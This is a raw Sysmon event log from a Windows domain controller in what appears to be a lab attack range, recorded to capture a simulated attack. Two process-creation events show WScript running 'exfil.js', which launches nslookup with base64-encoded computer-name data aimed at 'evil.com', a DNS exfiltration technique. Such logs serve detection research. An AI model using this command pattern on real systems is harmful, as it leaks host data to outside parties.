14:21:38.745{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.745{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.745{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.745{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-A044-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.745{2E1864BB-18F2-629A-9E44-000000005F02}36363656C:\Windows\system32\cmd.exe{2E1864BB-18F2-629A-A044-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.757{2E1864BB-18F2-629A-A044-000000005F02}3300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F2-629A-9E44-000000005F02}3636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsol.tmp 2>&1 10341000x8000000000000000211400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.729{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9F44-000000005F02}1660C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.729{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F2-629A-9F44-000000005F02}1660C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.713{2E1864BB-18F2-629A-9F44-000000005F02}16602036C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9E44-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.698{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9F44-000000005F02}1660C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.682{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.682{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.682{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.682{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.682{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F2-629A-9E44-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.682{2E1864BB-18E0-629A-6742-000000005F02}39765484C:\Windows\System32\WScript.exe{2E1864BB-18F2-629A-9E44-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.688{2E1864BB-18F2-629A-9E44-000000005F02}3636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsol.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000211389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.678{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.676{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000211380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.660{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjm.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.613{2E1864BB-18F2-629A-9C44-000000005F02}59445912C:\Windows\system32\conhost.exe{2E1864BB-18F2-629A-9D44-000000005F02}2932C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 